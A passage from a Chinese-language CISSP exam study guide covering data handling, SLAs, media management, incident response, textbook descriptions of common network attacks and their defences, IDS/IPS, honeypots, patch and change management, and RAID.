Data 数据存储的位置需要得到保护以防止丢失。数据主要存储在磁盘驱动中,并且需要人去周 期性的备份有价值的数据。存储敏感信息的备份位于一个位置,而其拷贝存放在另一个存储位 置。物理安全机制防止这些备份被偷盗。有关环境的控制防止数据由于腐蚀而丢失。 ④销毁 Destroying Data 数据当数据不再需要时销毁数据,且以一种数据不可读的方式来销毁。 2.信息所有者 Owner(考点) 创建信息的人必须对该信息直接负责,这个个体或群体被认为是“信息的所有者”。信息 所有者通常具有以下职责: ①确定信息对组织使命具有影响; ②了解信息的重置成本(如果它可以被取代); ③决定哪个组织需要这些信息和在什么情况下应该发布这些信息; ④了解该信息是不准确的或是不再需要的,应当销毁。 3.分级 Classification 按照敏感度即信息密级来区分。显然信息所有者必须与信息安全人员合作,对信息进行分 级,使用术语“机密”,“秘密”,“限制”或“敏感”等 来标记信息。分级关注的是访问。 4.分类 Categorization 按照影响度即信息的重要性来区分。分类是确定在组织中信息的保密性,完整性或可用性 损失影响的过程。分类的标准是根据:价值、寿命、使用期和人员关联。分类关注的是影响。 5.保留 Retention —197— 最后,所有的信息最终必须结束。组织经常囤积旧信息,有些法律也要求必须保留数据一 定的时间。 6 残留 Remanance 以某种形式删除数据之后,磁盘还会有剩磁,可以进行物理恢复的数据。 具体在第二域 C.3 章节里讲了。 E.6 服务水平协议 服务水平协议,也称为服务级别协议 SLA(service level agreement),是一个组织和外 部实体(如供应商)之间的一份协定,在与第三方合作时,应该清晰的知道自己的需求,并确保 SLA 中包含这些需求。SLA 是企业和外部供应商之间,但也可能是在公司内的个部门之间(这些 被称为操作水平协议,或者 OLA)。除了一个 SLA 之外,公司常常使用一个备忘录协议 memorandum of understanding(MOU)或者一个互联安全协议 interconnection security agreement (ISA),它们是非正式的,不包括违约的处罚,起到的约束作用有限。 SLA 应该包括两个方面的组件:服务和管理。 服务内容包括提供服务的细节,标准时间窗口的服务水平,每一方的责任,升级程序,权 衡成本/服务等。(提供什么服务) 管理要素应包括定义测量的标准和方法,报告流程,内容和频率,争端解决的过程,赔偿 条款等,以及更新协议的机构与方法等。(服务质量怎么样) SLA 不包含保密的、机密性!这是属于保密协议 NDA(non-disclosure agreement)的。 F.利用资源保护技术 F.1 介质管理 介质管理(media)是指采取措施保护介质和存储在介质上的数据的步骤。介质是指可以 保存数据的任何事物。它包括磁带、CD 和 DVD 光盘、便携式 USB 或 FireWire(火线)驱动器、 外部 SATA(eSATA)驱动器、内部硬盘、固态硬盘、USB 闪存驱动器等等。 国外也这么分:软拷贝介质(电子的、数字的)和硬拷贝介质(物理里纸张、胶片等)。 1.闪存驱动器控制 Controlling USB Flash Drives 采购 USB 闪存驱动器要限制在特定品牌范围内 2.磁带介质设备 Tape Media 磁带常因腐蚀而很容易损坏。最佳的方法就是保存至少两份备份,一份保存在外部,必要 时立即使用;第二份保存在安全的位置。磁带还不能暴露于磁场、高温中。 3.移动设备 Mobile Devices 移动设备包括手机和平板电脑等。这方面的安全讲的很多了,每个单位都有措施。 4.介质管理保护方法包括: 加密——在传输过程中加密——移动介质——云存储——虚拟存储 5.虚拟化存储的不同类型 虚拟存储是多个网络存储设备的物理存储池,由一个从中央控制台管理。虚拟化的好处是, 更便宜的硬件可用于提供企业级存储的功能。虚拟存储化可以更容易地帮助存储管理员执行备 —198— 份,存档、和恢复任务,并可以在较短的时间,以掩饰一个存储区域网络(SAN)的实际复杂性。 虚拟化存储的不同的类型包括: ①基于主机的储存 基于主机的虚拟化需要在主机上运行额外的软件,作为一个享有特权的任务或进程。在某 些情况下,容量管理是建立在操作系统上,而在其他情况下,它是作为一个单独的产品。卷(LUN) 提交给主机系统,由传统的物理设备驱动程序来处理。然而,一个软件层(卷管理器)驻留在磁 盘设驱动程序之上截取 I/O 请求,并且提供了元数据的查询和 I/O 映射。大多数现代操作系统 都内置有某种形式的逻辑卷管理(在 Linux 中它被称为逻辑卷管理器或 LVM;在 Solaris 和 FreeBSD、ZFS 使用 zpool 层;在 Windows 逻辑磁盘管理器或 LDM,执行虚拟化的任务。 ②基于设备的存储 主存储控制器提供虚拟化服务,并允许其他存储控制器直接连接。可能来自相同或不同的 供应商来实现这些功能。主控制器将提供集中和元数据管理服务。它也可以跨控制器提供虚拟 化复制和迁移服务。 ③基于网络存储 在基于网络设备的存储虚拟化操作(通常是一个标准的服务器或智能开关),使用 iSCSI 或 光纤通道(FC)网络连接为一个 SAN。这些类型是最常用实现虚拟化的设备。虚拟化设备位于 SAN 中,并提供主机之间的抽象层,执行 I/O 和提供存储控制器存储容量。 ④存档和离线存储 就是备份和恢复、归档。 6.记录管理 RIM 记录信息管理(RIM):ARMA 国际定义保护的企业信息的基本活动,保护硬拷贝记录和软 拷贝记录。这是一个用来管理信息的方法和工具。就是要保护好重要的数据资产,有 2 种类型: ①硬拷贝记录。就是纸张、胶片什么的,保护方法就是扫描。 ②数字记录。通过信息系统来读取和呈现。 F.2 硬件与软件资产管理 软件托管协议 Software Escrow Arrangements 是一种特殊的工具,可以对公司起到保护 作用:它避免公司受软件开发商的代码故障的影响,以便为产品提供足够的支持,还可以防止 出现由于开发商破产而造成产品失去技术支持的情况。在软件托管协议下,开发商将应用程序 源代码的副本提供给独立的第三方组织机构。然后,第三方用安全的方式维护源代码副本备份 的更新。这个经常考到,就是要给第三方的软件开发找一个监理人。(考点) 第八域 B.3 章节也讲了。 G.开展事件管理(实施事件响应) 事件响应的主要目标是尽量减少事件对组织的影响。 1.事件界定 Defining an Incident 事件有 2 个英文单词:Event 和 Incident ①Event:特定时间内发生的任何事件都称为事件。不过也有安全教材把 event 也看成是 —199— incident 安全事件了,即被发现、验证和记录的负面事件。管它的,好坏都对。 ②Incident:这是指事故,即对数据的机密性、完整性和可用性具有负面影响的事件。 反正,在 CISSP,事件全都是指计算机安全事件,即 Incident。 2.事件响应步骤 Incident Response Steps SP 800-61 是学习更多关于事件处理的极好资源,但它确定事件响应生命周期分为以下四 个步骤:①准备,②检测和分析,③遏制、消除和恢复,④事后恢复。 CISSP CIB(Candidate Information Bulletin)中概括的管理事件响应涉及五个步骤: 其实就是本章后面 7 个内容的中间 5 个步骤。(G.1 到 G.7) ①Detection②Response③Mitigation④Reporting⑤Recovery⑥Remediation⑦Lessons Learned ①检测;---②响应;--③缓解;----④报告;---⑤恢复;--⑥补救;-----⑦教训 也有教材这么分的步骤: ①诊断/分类(Triage)、②调查(Investigation)、③遏制(Containment)、④分析(Analysis) 和追踪(Tracking)、⑤恢复(Recovery) 3.事故/事件的类型 Common Types of Incidents ①非法扫描 Scanning 扫描攻击通常是先于其他更严重的攻击进行的侦察攻击。 ②非法访问 Compromise 非法访问指的是对系统或系统存储的信息进行的未授权访问。而且,合法用户 ID 的被恶 意使用是难以检测。 ③恶意代码 Malicious Code 病毒、间谍软件等等。 ④拒绝服务 最后一种事故类型是拒绝服务(DoS)。通常,这种事故类型是最容易检测的。多的不说了。 G.1 检测(发现)Detection 就是各种入侵检测了,Intrusion detection and prevention system 要做的事,不过要 注意判断真假,处理好误报 False-positives 和漏报 False-negatives 问题。 IDS 是旁路带外 out-of-band,IPS 是在线串连 in line。 G.2 响应 Response 许多组织有一个指定的事件响应团队——有时被称为一个计算机事件响应小组(CIRT) computer security incident response team,或计算机安全事件响应小组(CSIRT)。每个单 位都有自己的应急响应方案,这没什么好说的。计算机紧急响应团队(Computer Emergency Response Team) CERT,是一个小组,它负责监控,并提出关于安全准备和安全违规的建议。 1.事件响应团队分类 虚拟团队:临时抽组企业内相关专家组成,响应时间较慢,并且其成员在处理事故时必须 忽略他们的本职工作,代价很高。 永久团队:专人负责事故响应,对较小的企业来说不适用。 —200— 混合团队:个别核心成员是永久性的,而其他成员则在需要时才被召集。 2.过程 许多组织机构都采用三步骤的事故响应过程(其实是 6 个过程合成 3 个了,后面有讲): ①监测和确认 Detection and identification,确定事故以及通知适当的人员。 ②响应和报告 Response and reporting,包括:隔离与抑制、收集证据、分析与报告。 ③恢复和补救 Recovery and remediation,修正已发笺破坏,再恢复业务,加固系统。 G.3 缓解 Mitigation 缓解措施尝试遏制一个事件,限制其影响或范围。Mitigation 这个词最好翻译成“消减”。 确定了一项安全事件,响应的第一步就是牵制(Contain it),以控制事件的影响和范围。 Containment is the first step after detecting and verifying an incident. This limits the effect or scope of an incident. G.4 汇报(报告)Reporting 报告是指向组织内部,同时向组织外部报告事件。关于泄密事件,是有法律要求的,一般 必须在 24 小时内报告政府。 报告对外发布的对象是由数据所有者决定的。 G.5 恢复 Recovery 调查人员从一个系统收集所有适当的证据后,下一步是恢复系统,或将其恢复到一个完全 正常的状态。这个工作量根据事件的影响程度可大可小。不过要考虑病毒、木马等是不是没清 干净,要不要彻底的重建系统? G.6 补救 Remediation 亡羊补牢。在修复阶段(这不是恢复业务的阶段了),人员观察事件并确定什么原因导致 它发生,然后实施措施以防止它再次发生。最简单的就是打补丁,最重要的是根本原因分析。 根本原因分析(RCA)/问题管理 Problem management 从根本上说,根本原因分析(RCA)是问“为什么?”,直到有一个答案。RCA 涉及审查系统 日志,政策,程序,文档的安全性和捕获网络流量,可以先将小事件拼凑一起以推演出导致的 历史事件。一旦该事件被理解,RCA 团队可以反向工作,以确定哪些是允许发生的事件。逆向 工作将涉及与事件管理人员和调查人员合作的能力,确保所有相关信息正在被收集,记录和管 理,根据组织的事件程序处理,而且监管链是严格保持收集的所有证据。 G.7 汲取经验教训 Lessons Learned 最后是教训总结。事件响应小组将参与这个阶段,但是其它了解该事件的员工也将参与。 分析事件的处置流程,总结管理上、技术上、培训上的改进建议。当完成经验教训审查后,通 常需要事件响应团队编写一个报告。最烦就是写事件分析报告了。或许,事件响应的最重要的 部分是总结经验。组织有机会来分析和理解失败,并尝试以确保它不会再次发生。 —201— 这里又要讲一堆的攻击了,都不知道重复多少遍了,再罗列一下: 1.拒绝式服务攻击 Denial-of-Service Attacks 拒绝服务(DoS)攻击能够阻止系统处理或响应来自资源和客体的合法数据或请求。拒绝服 务攻击的最常见形式是向服务器传输使其无法全部处理的过多数据包,或让系统崩溃或 100% 的 CPU 使用率。另一种形式的 DoS 攻击是一种分布式拒绝服务(DDoS)攻击。还有一种变体的 DoS 形式被称为分布式反射拒绝服务(DRDoS) distributed reflective denial-of-service, 域名服务(DNS)投毒攻击和 smurf 攻击就是这样的例子。 2.SYN 泛洪攻击 SYN Flood Attack(让你回不停) SYN 泛洪攻击是一种常见的 DoS 攻击。它通过破坏 TCP/IP 启动通信会话的三步握手标准 来实施攻击。通常,客户端向服务器发出 SYN (同步) 数据包,服务器向客户端发送 SYN/ACK (同 步/应答)响应数据包,随后客户端向服务器回应 ACK (应答)数据包。这样三步握手建立起了 两个系统间的一个用于数据传输的会话,这个会话直到出现 FIN (结束)或 RST (重置)包才会 断开。然而,在一个同步字符(SYN)洪水式攻击发生时,攻击者发送成千上万个 SYN 包但不回 复响应。这类似于一个喜欢开玩笑的人伸出手去握手,但是当其他人做出回应,伸出手准备握 手时,他却将手缩了回来,留下对方的手悬在半空中。 使用 SYN Cookies 是阻断这攻击的一种方法。这些小记录消耗小部分系统资源,当系统 接收到 ACK 应答肘,它检查 SYN Cookie 并建立会话。防火墙通常能够通过入侵检测和入侵防 御系统检测 SYN 攻击。阻断这种攻击的另一种方法是降低 TCP 重置攻击服务器通常会等待一 段时间以接收 ACK 应答。默认时间是三分钟,但在正常操作中合法系统发送 ACK 应答并不需 要这么长的时间。通过减少时间,半开的会话在系统内存中的刷新会更快。 3.TCP 重置攻击 TCP Reset Attack(让你连不上) 另一种通过操纵TCP 会话的攻击方式叫做TCP 重置攻击,会话通常是FIN(完成)或RST(复 位)包。攻击者可以在一个 RST 包中伪造源 IP 地址并断开会话活动。两个系统之间则需要重 新建立会话。这对系统来说是一个很大的威胁,两系统之间需要持续的会话,以保持数据。当 会话重建时,系统就需要重建数据,所以这不仅仅只是来回发送三个数据包以建立会话的问题。 4.Smurf 和 Fraggle 攻击(前者反弹、后者 UDP) Srnurf(欺骗)和 Fraggle(磁片)攻击都属于 DoS 攻击。Smurf 攻击是另一种类型的洪 水式攻击,但它使用 Internet 控制消息协议(ICMP) 回送数据包而不是 TCP SYN 包攻击其他 系统。更具体地说,它是一个使用受害者的 IP 地址作为源 IP 地址的伪造广播 ping,让全网 都响应并回送数据包至受害 IP。在 1999 年发行的 RFC 2644 改变了路由器的标准,路由器不 能转发定向广播,网络便不能被放大。这给 Smurf 攻击单一的网络带来了限制。此外,在防 火墙上禁用 ICMP 能够防止利用 ICMP 的任何类型的攻击。现在 Smurf 攻击己经很少见了。 Fraggle 攻击类似于 Smurf 攻击。然而,Fraggle 攻击使用 UDP 端口 7 和 19 而不是 ICMP。 Fraggle 攻击能够使用伪造 IP 地址将一个 UDP 数据包发送给受害者。所有的系统就都会将其 转发给受害者,这类似于 Smurf 攻击。 SMURF 是反弹攻击,消耗带宽(ICMP);FRAGGLE 消耗性能(UDP)。 5.Ping 洪水攻击(呼死你) Ping 洪水攻击,通过给受害者发送洪水般的请求来达到攻击目的,在 DDOS 攻击中给僵尸 —202— 网络发送僵尸信息的效果很明显。如果成千上万的系统同时给一个系统发送 ping 请求,该系 统将在试图回答 plng 请求时发生混乱。 6.僵尸网络 Botnets 今天僵尸网络相当普遍。僵尸网络中的计算机就像机器人(通常称为僵尸 zombies,也叫 肉机),并将会按照攻击者的要求执行命令。僵尸牧人 bot herder 通常是指通过一个或多个命 令控制所有计算机和服务器的罪犯。 7.死亡之 Ping/Ping of Death(PING 大包) 一个 ping 死亡攻击采用了一个超大的 ping 数据包,即超过 64 字节,甚至大到 64KB。 当系统收到 ping 包大于 64 KB 时,就会出现问题。现今死亡 PING 攻击很少能够成功,因为补 丁和更新改善了系统的脆弱性。 8.泪滴攻击 Teardrop(拼不完整) 在泪滴攻击中,攻击者阻碍交通,系统无法将数据包一起发回。大数据包通常被分成较小 的碎片,当它们被发送到网络上时,接收系统把数据包碎片还原到原来的状态。然而,泪滴以 一种系统不能将文件还原在一起的方式分割数据包。旧的系统无法处理这种情况,并会崩溃, 但补丁解决了这个问题。此外,入侵检测系统可以检查畸形数据包。 7.Land 攻击(自己搞自己) Land 攻击是指攻击者使用受害者的 IP 地址作为源 IP 地址和目的 IP 地址,并发送伪造 的 SYN 包给受害者。这使系统不断地对自己做出应答,并最终可能会冻结,崩溃或重新启动。 这种攻击在 1997 被第一次发现,它又几次攻击不同的端口。保持一个系统更新并使用过滤流 量检测相同的源和目的地地址,有助于防止 Land 攻击的发生。 8.零日攻击 Zero-day Exploit 零日漏洞是指利用他人未知的系统漏洞对系统发起攻击,也指无法修补的漏洞。 9.恶意代码 Malicious Code 恶意代码是指在计算机系统上执行不必要的、未经授权的或未知活动的脚本或程序。恶意 代码可以采取多种形式,包括病毒,蠕虫,木马,具有破坏性宏的文件,和逻辑炸弹。它通常 被称为恶意软件,或恶意代码。恶意代码存在于每一种类型的计算机或计算设备,是现今最常 见的安全漏洞。 10.中间人攻击 Man-in-the-Middle Attacks 当一个恶意用户能够在一个正在进行的通信的两个端点之间的逻辑上获得一个位置时, 一个中间人攻击就会产生。中间人攻击有两种。一个涉及复制或刺探双方通信,这基本上算是 嗅探器攻击;另一种类型是攻击者在通信线上定位自己,他们将其作为一个存储和转发或代理 机制,客户端和服务器认为它们是直接连接的。攻击者可以收集登录凭据和其他敏感数据,以 及改变两个系统之间交换的消息内容。 中间人攻击比其他许多攻击需要更多技术性,因为从客户角度出发,攻击者需要冒充服务 器,从服务器的角度来看,还要模拟客户端。中间人攻击往往需要一个组合的多个攻击。例如 攻击者可能会改变路由信息和 DNS 的值,或伪造地址解析协议(ARP)查找。 11.战争拨号 War Dialing 使用调制解调器搜索接受入站连接尝试的系统的行为,就是大量拨号。一旦检测到某个计 —203— 算机载波音,战争拨号器就会在搜索过程结束时所生成的报告中添加相应的电话号码。一种新 的战争拨号的形式能够在不适用调制解调器的情况下,使用语音互联网协议(VoIP)拨号,这使 得攻击者能够扫描到更多的电话号码,并发现除了调制解调器以外的其他设备,如传真机、语 音信箱、拨号音和人类的声音。 抵御恶意战争拨号攻击的对策包括:实施强大的远程访问安全性(主要依靠强的身份验 证),确保不存在未授权的调制解调器,以及使用回叫安全机制、协议约束与呼叫登入。 12.破坏 Sabotage 员工破坏指的是员工对单位的破坏行为。员工被解雇后必须立即终止或禁用其账户,预防 员工破坏的其他保障措施还存定期审计、监测异常或未经授权的活动,保持员工和管理人员之 间的沟通开放,并适当奖励员工。 13.间谍 Espionage 间谍活动是一种收集专有的、秘密的、私人的、敏感的或机密信息的恶意行为。 H.操作和维护预防措施 H.1 防火墙 第四域 B.3 章节已经详细讲过防火墙了。这里不讲了。 H.2 入侵检测和预防系统 入侵检测系统(IDS) intrusion detection system 通过自动检测日志和实时系统事件以 检测入侵和系统故障。入侵防御系统(IPS) intrusion prevention system 具有入侵检测系统 的所有功能,而且还可以采取额外的措施来阻止或防止入侵。入侵防御系统( IPS)不是旁路接 的,是串接在网络的,能够在攻击到达目标系统之前进行检测并阻止攻击。 IDS 的三大基本组件是(采集、分析、告警): ①传感器/探测器(Sensor),也被称为探针,或代理(Agent),采集数据流量。 ②分析器/控制与通讯(Analyzer),收集信息,通过分析确定是否有攻击或滥用行为发 生征兆或先兆。 ③发声器/用户界面(User Interface),管理员用来查看 IDS 收集的信息以及做出的判 断,对 IDS 进行配置和调整所使用的管理界面。 1.基于知识的和基于行为的检测 Knowledge- and Behavior-based Detection IDS 通过监控网络流量和检查日志,来检查有无可疑活动。有 2 种常见方法来检测和识别 恶意行为: ①基于知识/模式匹配/特征分析(基于规则,经验式的检测)(Knowledge-Based/Pattern matching/Signature-Based)。使用签名,又称基于模式匹配的检测或检测签名。它使用 1 个 关于己知攻击的特征的数据库,当模式匹配时,就被认为是一个攻击。它的缺点是,对未知的 攻击无能为力。在产品环境中发现的攻击或病毒称为“野生的(in the wild)”。已经存在但 尚未公布的攻击或病毒称为“动物园内的(in the zoo)”。(发现的是野生,未知的是园内) 此外,它还包括基于状态匹配(State-Based)的:将某些系统状态转变(State Transition) 视为遭受了攻击,以通信流为背景、并分析整个系统的行为,而不是单个数据包或分散的数据 报告。状态(State)是操作系统的值在可变的、临时的和永久内存位置上的一个快照。 —204— ②基于行为/统计异常(Behavior-based/Anomaly-based/ Statistical Anomaly)。不使 用签名,将活动同正常性能的基线进行对比,以检测异常行为。缺点是误报比较多。(基于统 计,启发式的检测) 其实比较清晰的分类是这样的: ①基于特征 Signature-based: 包括特征匹配(Pattern matching)和状态匹配(Stateful matching)。 ②基于异常 Anomaly-based,也称为基于行为,或启发式: 包括统计异常(Statistical anomaly–based)、协议异常(Protocol anomaly–based) 和流量异常(Traffic anomaly–based)。 ③基于规则 Rule-based(专家系统),一般把基于规则和基于特征都看成是基于知识的。 规则型 IDS 采用一种不同于特征型或统计异常型系统的检测方式。专家系统由知识库、推理引 擎和规则型编程组成。知识以规则表示,将要接受分析的数据则称为事实。系统的知识以规则 性编程(IF situation THEN action)编写。这些规则应用于事实、来自传感器的数据或者某个 被监控的系统。推理引擎负责为这个过程提供某些人工智能;通过使用推理规则,推理引擎可 以从提供的数据中推断出新的信息。 也就是说,在专家系统使用的规则型 IDS 中,IDS 从传感器或日志中收集数据,然后推理 引擎对这些数据应用预先编程的规则。如果发现与规则相符的特征,那么 IDS 就会发出报警戒 提供一个解决方案。 ④基于神经网络(Aritificial Neural Network ANN)。专家系统的一种。 2 主机型和网络型的 IDS/ Host- and Network-based IDSs 根据信息来源进行分类,IDS 有 2 种:主机型与网络型。 ①主机型 host-based IDS (HIDS)。监视单个计算机系统上的可疑活动,占用系统资源。 ②网络型 network-based IDS (NIDS)。监视在网络上进行的可疑活动,对加密数据无效。 NIDS 很难检测交换网络(相对于传统的非交换环境),因为在这种网络中,数据通过独立 的虚拟电路(PVC)传输,而不是像非交换环境那样通过广播传输。IDS 传感器是一个嗅探器, 它不能访问这些电路中的所有流量。因此,我们必须从每一个虚拟专用连接中提取所有的数据, 复制这些数据,并将数据副本传送到传感器所在的端口(生成端口)。这样,传感器就可以访问 进出交换网络的所有数据。 它们的区别和优缺点经常考,不过都很好理解,容易。 3.IDS 响应 IDS Response 当入侵检测系统检测到事件时,也有 2 种响应方式:主动响应和被动响应。在某些情况下, 可以在防火墙前后各放置一个被动的检测系统,以检查防火墙的有效性。通过检查两个 IDS 警 报,便能确定被防火墙阻挡的攻击类型而不是正在进行的攻击类型。 ①被动响应 Passive Response。系统记录事件并发送一个通知。也就是各种形式的告警, 怎么处理看着办。 ②主动响应 Active Response。系统通过改变环境来阻止活动而不是做记录和发通知。可 以使用几种不同的方法来修改环境,如修改 ACLs 以阻止基于端口、协议和源地址的流量输出, 甚至禁用某一条通信链路。使用积极响应方式的 IDS,通常被称为 IPS(入侵防御系统)。 —205— 4.黑暗网络/暗网/深网 Darknets 对于入侵检测来说,黑暗网络是使用已分配的未使用的 IP 地址和一个检测进入黑暗网络 流量的设备,如果一个正在探测网络的攻击者或恶意软件正在试图扩散,那么在黑暗网络中的 主机将会探测和捕捉到这个活动。这样的检测很准,很少有误报,因为合法流量不会出现在黑 暗网络中。(有点像是蜜罐、蜜网) 对于黑客攻击来说,暗网是不会发现和记录的,隐藏的网络。 H.3 白名单/黑名单 白名单/黑名单很好理解,不解释了,配防火墙都知道。 白名单列表中的电子邮件地址和/或互联网地址,是己知“好”的人。相对应,黑名单列 表是己知“坏”的人。灰名单是一种方法,意思是“我不知道你是谁,所以我会通过一些额外 的安全措施,使您的电子邮件发出之前,我接受它。” H.4 第三方安全服务 用第三方要考虑合规性。比如:与第三方公司签订合同,以帮助提供动态应用程序安全测 试(DAST)服务,一个 DAST 技术用于检测应用程序有安全漏洞时的运行状态。大多数 DAST 解决 方案是基于 Web 的,测试公开的 HTTP 和 HTML Web 启用应用程序。 1.渗透测试 Penetration Testing 渗透测试(通常简称为 pentest),模仿一个实际攻击来尝试确定攻击者会使用哪些技术绕 过应用程序,系统,网络或组织的安全性。它可能包括漏洞扫描,端口扫描,数据包嗅探,DoS 攻击和社会工程技术等。渗透测试的目标有: ①确定系统对于一个攻击的容忍度。(测底线) ②确定员工检测和实时响应攻击的能力。(验能力) ③识别可以降低风险的控制措施。(提建议) 渗透测试和安全评估一样,也有几种不同的类型: 白盒(全知识)、黑盒(零知识)、灰盒(部分知识)。 2.渗透测试的风险 有些方法可能会导致系统或网络中断。 3.道德黑客行为 Ethical Hacking 道德黑客经常被用作渗透测试的另一个名称。道德黑客指的是了解网络安全和并知道如何 破解安全性,却不利用该知识为自己谋利的人。就是红客。 H.5 沙箱 Sandboxing 沙箱/沙盒:是一种虚拟化软件,可以让程序运行在自己独立的虚拟环境。它为应用提供 了一个安全边界,以防止应用程序与其他应用程序交互,通常情况下,程序运行在沙箱中,对 文件和系统限制访问,相关的改变都是临时的。这是一种替代基于签名/特征的防护软件(入 侵检测系统)的解决方案,被看作是发现零日,尤其是隐身攻击恶意软件的一种方式,可以检 测未知的应用或未知的病毒,也可以用来观察恶意软件的行为。 —206— 虚拟机或沙箱有时也称为模拟缓冲区(emulation buffer)。 H.6 蜜罐/蜜网 Honeypots/Honeynets 前面讲入侵检测有一个黑暗网络的技术,其实有点类似了。蜜罐就是用有漏洞的系统或网 络来引诱和发现恶意攻击,可以用来延迟入侵者的侵入时间,以便 IDS 尽可能多的检测和收集 有关入侵者的信息。蜜罐系统是一个诱饵服务器或系统,通常部署在一个防火墙的 DMZ 区,不 能取代传统的安全系统,他们只是标准的入侵检测系统(IDS)的变种,但更侧重于信息收集和 欺骗。许多安全专家认为蜜罐能够有效防范零日攻击。这会涉及一些法律问题,当蜜罐的所有 者通过“钓鱼执法”来诱捕未授权的入侵者,可能是非法的。 两个或多个蜜罐在网络上形成一个蜜网。通常,蜜网是用于监测一个大的/或更多不同的 网络,一个蜜罐可能并不够用,也不典型全面。蜜网和蜜罐通常是大规模网络中入侵检侧系统 的组成部分。蜜场是一个集中的蜜罐分析工具。包括一些常见的蜜罐: 与蜜罐相关的概念还有一个“伪漏洞”Pseudo Flaws。伪漏洞是被故意植入在系统中试图 引诱攻击者的虚假漏洞或明显漏洞。 常见的蜜罐工具有: ①Glastopf,开源蜜罐,Python+PHP+MySQL。 ②Specter,商业蜜罐。 ③Ghost USB,免费的 USB 仿真蜜罐,针对 U 盘病毒。 ④KFSensor,基于 Windows 和蜜罐的 IDS。 另一个概念是“填充单元/填空模块”Padded Cells。填充单元是一个模拟环境,类似蜜 罐一样,通过提供伪造数据来吸引入侵者的兴趣。当入侵者被 IDS 检测到的时候,入侵者被自 动地转移到一个填充单元。填充单元具有实际网络的结构和布局,但是在填充单元里,入侵者 既不能执行任何恶意的活动,也不能访问任何机密数据。 诱捕(Enticement)为他人的预谋(Ready and Willing)犯罪提供机会。 陷害(Entrapment)是引诱或劝说他人进行非预谋(No Previous Intent)犯罪。 H.7 反恶意软件 阻止恶意代码最重要的措施是使用带有最新文件的反恶意软件的软件 anti-malware。而 攻击者则定期发布新的恶意软件,并经常修改现有的恶意软件,以防反恶意软件的检测。反恶 意软件厂商寻找这些变化,并开发新的签名文件来检测新的恶意软件并对其进行修改。 1.恶意软件 要监视恶意软件,有必要介绍沙箱和钩子。这些钩子可以直接插入到一个程序去通知或调 用(回调函数)库的函数。拦截系统调用的主要问题是,沙箱看不到恶意软件执行任何指令之间 的调用。这是一个很大的盲点,恶意软件的作者可以把这个作为一个目标,在系统调用之间运 行代码。恶意软件采用了多种技术和方法来逃避检测。这些技术之一将恶意代码延迟执行,使 得一个沙箱超时。然而,要做到这一点,恶意软件并不是简单的睡眠。相反,恶意软件执行一 些无用的计算活动,恶意软件通过延迟技术的工作原理,因为它在沙箱中仅仅是执行功能,从 哪方面来看,都像是一个正常的程序。 —207— 另一个逃避的方法是通过环境进行的检查。恶意软件作者可以添加新的,与零日有关的环 境,检查相关的系统运行和操作的返回值进行规避,迫使供应商更新他们的沙盘来应对。 I.实施和支持补丁与漏洞管理 1.补丁管理 Patch Management 补丁有时被称为更新、快速修复或热修复。服务包是一个补丁的集合,携带着一个系统当 前最新的补丁。一个有效的补丁管理程序能够确保系统安装当前最新的补丁。下面是有效的补 丁管理程序的通用步骤: ①评估补丁 Evaluate:确定补丁是否适用于他们的系统。 ②测试补丁 Test:确定该补丁不会带来其他副作用。 ③批准补丁 Approve:确定补丁的安全性后,就会批准补丁的部署。 ④部署补丁 Deploy:经过测试和批准,管理员部署补丁。 ⑤确认补丁己部署 Verify:在部署补丁后,管理员定期测试和审计系统,以确保系统补 丁仍然有效。 补丁星期二和漏洞星期三 Patch Tuesday and Exploit Wednesday。 微软经常在每个月的第二个星期二发布补丁,这一天通常被称为补丁星期二。于是,很多 黑客立马利用该补丁所补救的漏洞来进行攻击,因为很多用户不会那么快就把新补丁打上,这 个时间段被称为漏洞星期三。 2.漏洞管理 Vulnerability Management 漏洞管理是指定期检测漏洞,及时修补高危漏洞,评估并采取相应措施以减少相关风险。 一个漏洞管理程序的两个常见要素是例行漏洞扫描和定期脆弱性评估。职责分离原则会要求组 织中一个人负责补丁,一个人负责漏洞,可以互相验证、监督。 3.漏洞扫描 Vulnerability Scans 利用漏洞扫描器来检测系统和网络中的漏洞,如补丁丢失或弱口令等,并在被攻击之前修 补漏洞。最著名的工具是 Nessus,不过它已经商业化了,要收费。 4.脆弱性评估 Vulnerability Assessments 从字面上看,就是漏洞水平评估。一个脆弱性评估不只是漏洞扫描结,还要分析过去所有 的漏洞扫描报告,以确定该单位是否正在修复漏洞。脆弱性评估往往是风险分析或风险评估的 一部分,以确定在一个时间点的漏洞。 短期脆弱性评估有时也被看作是风险评估。做渗透测试的前提也是先做脆弱性评估。 5.常见漏洞和披露 Common Vulnerabilities and Exposures 主要是官方的漏洞库了。如:通用漏洞披露(CVE) Common Vulnerability and Exposures, 它由 MITRE 维护。 J.参与和理解变更管理流程(例如:版本控制、基线化、安全性影响分析) 变更管理的主要目标是确保变更不会导致中断。变更管理流程要求适当的人员在实施变更 前需审查和批准变更,并做详细记录。其实,变更管理的内容放在这个位置不合适,应该在讲 完 D.2 章节的配置管理,也就是搞完“基线”后,接着搞“变更”。 —208— 1.安全影响分析 做变更,必须先做安全影响分析。变更管理控制提供了一个过程去控制、文档化、跟踪和 审计所有系统的变化。在变更管理过程中的常见任务如下: ①请求变更 Request。 ②影响分析/影响评估 Impact Assessment ③审查变更 Review ④批准/不批准 Approve/reject/Approval/Disapproval ⑤构建和测试 Build and Test (考试中有排序题,记住要先测试变更,再执行变更) ⑥通知/通告 Notification ⑦实施变更 Schedule and implement。 ⑧验证 Validation ⑨记录/版本更新和基线 Document。 2.版本控制 Versioning 如果不能通过某种类型的版本控制系统来控制变更,可能会引发由于变更导致的系统瘫 痪。变更管理必须文档化。 K.实施恢复策略 自然灾害有很多,像火灾、地震、洪水、暴雨、台风什么的;人为灾害也有很多,像火灾、 恐怖袭击、工业爆炸、停电什么的;此外,公共基础设施的灾害也有很多,像软/硬件故障、 停电、罢工、盗窃什么的。信息安全的范畴很大,凡是影响系统和数据安全稳定的因素都要考 虑,安全专家必须是全才。 保护服务器、电源什么的是很常见的技术了,不多说。 K.1 备份存储策略(例如异地存储、电子链接、磁带旋转) 这章考的比较细的。 1.磁盘阵列 Redundant Arrays of inexpensive Disks 在计算机中添加容错和系统恢复组件的常见方法是增加一个冗余磁盘阵列(RAID)。一些常 见的配置如下:常考是的 0、1、1+0、5。先要了解几个技术:镜像 Mirroring、校验 Parity、 条纹/条带化 Striping(字节级、块级的并发存储)。 ①RAID-0,也被称为条带 striping。它使用两个或两个以上的磁盘,提高性能,但不容 错。写文件到多个磁盘上的条纹上,无奇偶校验信息的使用。这种技术允许快速阅读和写入磁 